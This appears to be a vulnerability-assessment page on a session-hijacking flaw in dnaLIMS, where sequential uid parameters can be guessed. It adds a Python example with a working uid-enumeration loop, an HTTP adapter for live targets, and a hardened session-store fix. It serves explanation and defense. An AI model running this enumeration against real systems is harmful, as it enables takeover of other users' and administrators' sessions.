An issue was discovered in dnaTools dnaLIMS 4-2015s13. dnaLIMS is vulnerable to session hijacking by guessing the UID parameter.
Recent assessments:
h00die at March 27, 2020 4:08pm UTC reported:
The uid field is passed within a GET parameter. These are sequential integers, so it is trivial to enumerate them all. The session for the UID needs to be valid, and the timeout is rather long. So it's rather trivial to simply enumerate through them in an infinite loop to get an admin.
Assessed Attacker Value: 3
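The enumeration the assessment above describes, and the fix a developer would apply, as an added example. This is not code from dnaTools, dnaLIMS, or the assessor; the only detail taken from the page is that the session identifier is a sequential integer passed as a GET parameter named uid. The endpoint path, the response text, and the set of live sessions are constructed assumptions so the logic runs offline. The hardened SessionStore shows the two properties the vulnerable design lacks: an identifier with enough entropy that guessing is infeasible, and an idle timeout that shrinks the window in which a guessed identifier is still live.

```python
import hmac
import secrets
import time
import urllib.request
from typing import Callable, Optional

# Constructed stand-in for the application's session table: sequential uid -> role.
# Assumption for illustration only; the real dnaLIMS backend is not documented here.
FAKE_SESSIONS = {
    1041: "user",
    1042: "admin",
    1077: "user",
}

def fake_get(uid: int) -> str:
    """Simulates GET /<app>?uid=<n>. The response wording is an assumption."""
    role = FAKE_SESSIONS.get(uid)
    if role is None:
        return "<html>Session expired or invalid</html>"
    return f"<html>Welcome back, role={role}</html>"

def http_get_factory(base_url: str, timeout: float = 5.0) -> Callable[[int], str]:
    """Adapter for a live target: base_url is hypothetical, e.g. 'http://host/cgi-bin/app'."""
    def get(uid: int) -> str:
        with urllib.request.urlopen(f"{base_url}?uid={uid}", timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return get

def enumerate_uids(get: Callable[[int], str], start: int, stop: int,
                   marker: str = "role=admin") -> Optional[int]:
    """Walk a contiguous uid range; return the first uid whose page carries `marker`.

    With sequential integers the whole space is a small contiguous range, so a
    single pass over [start, stop) finds every live session. A long session
    timeout only makes this more reliable, since hits stay valid while the loop runs.
    """
    for uid in range(start, stop):
        if marker in get(uid):
            return uid
    return None

def hijack_session_example() -> Optional[int]:
    """Run the enumeration against the constructed fake backend."""
    return enumerate_uids(fake_get, 1000, 1100)

class SessionStore:
    """Hardened alternative (added here, not dnaLIMS code): random 256-bit tokens,
    constant-time lookup, and an idle timeout after which a token is discarded."""

    def __init__(self, idle_seconds: float):
        self.idle_seconds = idle_seconds
        self._sessions: dict[str, tuple[str, float]] = {}  # token -> (role, last_seen)

    def create(self, role: str, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 32 random bytes; not enumerable
        self._sessions[token] = (role, now)
        return token

    def lookup(self, token: str, now: Optional[float] = None) -> Optional[str]:
        now = time.time() if now is None else now
        match = None
        for stored in self._sessions:
            # compare_digest avoids leaking the token prefix through timing
            if hmac.compare_digest(stored.encode(), token.encode()):
                match = stored
        if match is None:
            return None
        role, last_seen = self._sessions[match]
        if now - last_seen > self.idle_seconds:
            del self._sessions[match]  # expired: treat as if it never existed
            return None
        self._sessions[match] = (role, now)  # refresh idle timer on use
        return role

if __name__ == "__main__":
    print("admin uid found by enumeration:", hijack_session_example())
    store = SessionStore(idle_seconds=900)
    tok = store.create("admin", now=0.0)
    print("random token length:", len(tok), "lookup after 15 min idle:", store.lookup(tok, now=1000.0))
```

Against the fake backend the loop needs at most 100 requests to land on the admin session; against the hardened store the search space is 2^256 tokens and any hit goes stale after fifteen idle minutes, so the same loop never terminates usefully.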